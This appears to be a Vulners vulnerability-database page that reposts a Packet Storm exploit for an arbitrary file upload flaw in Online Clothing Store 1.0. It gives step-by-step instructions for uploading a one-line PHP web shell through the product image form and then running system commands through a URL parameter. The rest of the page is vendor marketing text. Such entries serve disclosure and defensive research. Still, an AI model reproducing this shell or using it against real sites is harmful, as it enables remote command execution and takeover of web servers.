Lucene search
K

Online Clothing Store 1.0 Arbitrary File Upload

🗓️ 07 May 2020 00:00:00Reported by Saurav ShuklaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 111 Views

Online Clothing Store 1.0 Arbitrary File Upload vulnerabilit

Code
`# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload  
# Date: 2020-05-05  
# Exploit Author: Sushant Kamble and Saurav Shukla  
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip  
# Version: 1.0  
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4  
  
  
#Vulnerable Page: Products.php  
  
#Exploit  
Open Products.php and select any product  
Fill details  
Create php shell code with below script  
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>  
Click on upload Image  
Select php file  
Click Submet  
Access below URL:  
http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir  
add system commands after e to execute it.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation